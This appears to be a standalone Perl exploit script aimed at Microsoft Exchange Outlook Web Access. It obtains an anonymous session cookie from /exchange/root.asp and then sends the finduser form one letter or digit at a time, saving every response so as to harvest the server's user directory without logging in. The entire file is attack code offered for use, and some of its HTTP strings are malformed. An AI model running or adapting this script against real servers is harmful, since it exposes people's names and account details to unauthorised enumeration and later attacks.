#!/usr/bin/perl use IO::Socket; if($#ARGV < 1) { die "Heh Usage: $0 "; } open(OUT, ">>$ARGV[1]") || die "Can't open $ARGV[1]: !$\n"; my $eof = "\015\012" x 2; # same shit setting up target, port timeout my $sock = new IO::Socket::INET( PeerAddr => $ARGV[0], PeerPort => 80, Timeout => 2, Proto => 'tcp'); if (!$sock) { $results = "port closed"; } else { print "Getting..\n"; print $sock "GET /exchange/root.asp?acs=anon HTTP/1.1\015\012Host: $ARGV[0]" . $eof; } eval { # setup eval again with 15 sec timeout local $SIG{ALRM} = sub { die "Timed Out" }; alarm(100); while (<$sock>) { print $_; if ($_ =~ m/^Set-Cookie:(.*?);/) { $cookie = $1; if ($cookie) { print $sock "GET /exchange/logonfrm.asp HTTP/1.1\015\012Host: $ARGV[0]\015\012Cookie: $cookie" . $eof; print $sock "GET /exchange/root.asp?acs=anon HTTP/1.1\015\012Host $ARGV[0]\015\012Cookie: $cookie" . $eof; } } }; @alphabet = qw(a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0); foreach $char (@alphabet) { my $eof = "\015\012" x 2; my $newsock = new IO::Socket::INET( PeerAddr => $ARGV[0], PeerPort => 80, Timeout => 2, Proto => 'tcp'); if (!$newsock) { $results = "port closed"; } else { print $newsock "POST /exchange/finduser/fumsg.asp HTTP/1.1\015\012Host: $ARGV[0]\015\012Accept: \*\/\*015\012Content-Type: application/x-www-form-urlencoded015\012Content-Length: 44\015\012Cookie: $cookie\015\012 DN=$char&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=\015\012\015\012"; print "POST /exchange/finduser/fumsg.asp HTTP/1.1\015\012Host: $ARGV[0]\015\012Accept: \*\/\*015\012Content-Type: application/x-www-form-urlencoded015\012Content-Length: 44\015\012Cookie: $cookie\015\012 DN=$char&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=" } eval { # setup eval again with 15 sec timeout local $SIG{ALRM} = sub { die "Timed Out" }; alarm(100); while (<$newsock>) { print $_; print OUT $_; } } }; }